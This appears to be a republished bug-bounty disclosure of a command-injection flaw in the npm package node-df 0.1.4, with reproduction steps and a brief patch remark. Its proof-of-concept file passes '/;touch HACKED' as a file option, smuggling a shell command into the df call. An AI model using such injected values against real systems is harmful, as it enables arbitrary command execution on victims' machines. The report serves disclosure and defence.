Node.js third-party modules: [node-df] RCE via insecure command concatenation
I would like to report a RCE issue in the node-df module. It allows to execute arbitrary commands remotely inside the victim's PC Module module name: node-df version: 0.1.4 npm page: https://www.npmjs.com/package/node-df Module Description node-df (abbreviation of disk free) is a cross-platform Node.js wrapper around the standard Unix computer program, df. Module Stats [N/A] downloads in the last day [3,023] downloads in the last week [N/A] downloads in the last month Vulnerability Description The issue occurs because a user input is concatenated inside a command that will be executed without any check. The issue arises here: Steps To Reproduce: Create the following PoC file: ```js // poc.js var df = require('node-df'); var options = { file: '/;touch HACKED', prefixMultiplier: 'GB', isDisplayPrefixMultiplier: true, precision: 2 }; df(options, function (error, response) { if (error) { throw error; } console.log(JSON.stringify(response, null, 2)); }); ``` 1. Execute the following commands in terminal: bash npm i node-df # Install affected module ls # Make sure there isn't any *HACKED* file node poc.js # Run the PoC ls # The *HACKED* file has been created 1. The HACKED file will be created {F594172} Patch Don't concatenate commands using insecure user's inputs :) Supporting Material/References: [OPERATING SYSTEM VERSION]: Kali Linux [NODEJS VERSION]: 10.16.3 [NPM VERSION]: 6.0.9 Wrap up I contacted the maintainer to let them......
https://vulners.com/hackerone/H1:703412?utm_source=rss&utm_medium=rss&utm_campaign=rss
